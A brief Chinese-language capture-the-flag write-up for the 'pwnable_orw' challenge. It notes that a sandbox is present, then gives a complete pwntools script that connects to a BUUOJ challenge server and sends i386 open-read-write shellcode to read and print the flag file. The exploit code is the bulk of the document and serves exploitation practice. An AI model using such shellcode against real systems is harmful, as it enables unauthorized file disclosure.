pwnable_orw

pwnable_orw

查看保护


加了沙盒。orw吧。去网上搜一下orw的汇编一大把。这里也可以用pwntools自带的。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25964)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)


orw_open = '''
xor ecx,ecx;
xor edx,edx; 
push ecx;
push 0x67616c66;
mov ebx,esp;  
mov eax,0x5;  
int 0x80; 
'''

orw_read = '''
mov eax,0x3;  
mov ecx,ebx;  
mov ebx,0x3; 
mov edx,0x100; 
int 0x80;  
'''

orw_write = '''
mov eax,0x4; 
mov ebx,0x1; 
int 0x80; 
'''

shellcode = asm(orw_open + orw_read + orw_write)
r.sendline(shellcode)

r.interactive()